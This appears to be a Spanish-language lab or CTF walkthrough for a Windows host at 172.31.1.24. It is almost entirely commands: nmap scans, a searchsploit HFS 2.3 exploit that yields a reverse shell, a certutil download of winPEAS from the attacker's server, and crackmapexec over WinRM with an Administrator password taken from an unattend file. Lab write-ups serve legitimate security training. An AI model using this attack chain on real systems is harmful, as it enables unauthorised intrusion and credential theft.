nmap -A -p- -oA output 172.31.1.24 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.24 -oG allPorts

Pasted image 20210704153649.png

extractPorts allPorts

Pasted image 20210704153715.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.24 -oN targeted

Pasted image 20210704154037.png

nmap --script http-enum -p80 172.31.1.24 -oN webScan

whatweb 172.31.1.24:80

Pasted image 20210704154210.png

cat targeted

Pasted image 20210704154244.png

Pasted image 20210704154006.png

Buscamos HFS 2.3 en searchsploit

searchsploit HFS 2.3

Pasted image 20210704154538.png

Pasted image 20210704155301.png

searchsploit -m 49584.py

Cambiamos los puertos y las IPs de LHOST y RHOST en el script

python3 49584.py

Pasted image 20210704155026.png

Obtenemos un reverse shell

python3 -m http.server 8888

certutil -urlcache -split -f "http://10.10.0.12:8888/winPEASany.exe" winPEASany.exe"

Pasted image 20210704162935.png

.\winPEASEany.exe

Pasted image 20210704155340.png

whoami

syteminfo

whoami /priv

cd C:\Windows\Panther

file Unattended.xml

Pasted image 20210704155719.png

Pasted image 20210704155901.png

crackmapexec winrm 172.31.1.24 -u Administrator -p 'cnt4weRAbtXMTSVV' -x 'whoami'

